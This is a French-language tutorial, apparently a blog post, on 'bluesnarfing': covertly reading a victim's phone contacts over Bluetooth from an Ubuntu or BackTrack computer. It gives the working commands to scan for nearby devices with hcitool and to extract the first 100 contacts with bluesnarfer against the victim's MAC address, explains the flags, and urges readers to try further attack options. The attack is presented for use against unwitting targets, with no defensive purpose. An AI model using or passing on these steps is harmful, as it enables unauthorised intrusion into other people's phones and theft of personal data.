Pénétrer dans un téléphone portable avec un ordinateur

Pénétrer dans un téléphone portable avec un ordinateur

Je vais vous expliquez, dans ce tutoriel , entièrement réécrit provenant de « Liberty’s Hacker », comment pénétrer dans un téléphone portable à l’aide d’un ordinateur doté d’Ubuntu (ou BackTrack, mais ce tutoriel se porte principalement sur Ubuntu, où l’utilisation est légèrement plus complexe).

Merci à ii-DoS-HacK

Pénétrer dans un Téléphone Portable avec un Ordinateur :
Pour Ubuntu, à savoir que je parle de la version 10.10 que j’utilise (encore à l’heure où j’écris le tutoriel), il y aura une étape supplémentaire. En effet, contrairement à BackTrack, Ubuntu ne dispose pas nativement de Bluesnarfer.On va devoir utiliser les packets suivant :
Code :
hcitool
Bluesnarfer

Je peux vous renvoyer directement sur ce lien pour l’installation de Bluesnarfer (imagé, et assez clair dans l’ensemble) : ICI (Clear Web)

Hcitool est, pour sa part, déjà présent sur Ubuntu (10.10).

(Maintenant que ce soit pour BackTrack ou Ubuntu, la technique est plus ou moins la même)

On commence par scanner avec hcitool :

Code :
sudo hcitool scan

En faisant ceci, vous allez voir s’afficher sur votre écran quelque chose de semblable :

Code :
Adresse MAC            Nom du Bluetooth
00:15:AB:XX:15:8F    Portable_De_Victime

Copiez l’adresse MAC du portable la victime.

Maintenant nous n’aurons plus besoin d’Hcitool, on va donc utiliser Bluesnarfer :

Code :
>sudo bluesnarfer -r 1-100 -b 00:15:XX:XX:15:8F

Explications :

-r vous permet d’accèder à la liste de contact du Nième au Xième contact, ici on aurait donc vu les 100 premiers contacts (dans l’ordre alphabétique) de notre victime.

-b permet d’indiquer sur quel téléphone on doit lancer l’attaque, il faudra donc y placer l’adresse MAC de la victime.

Avec cette commande, on peut donc voir les contacts que le Portable_De_Victime contient.

Il existe d’autres commandes que je vous invite à tester en utilisant l’aide interne de Bluesnarfer. Car le principe fondamental reste le même.

 

Laisser un commentaire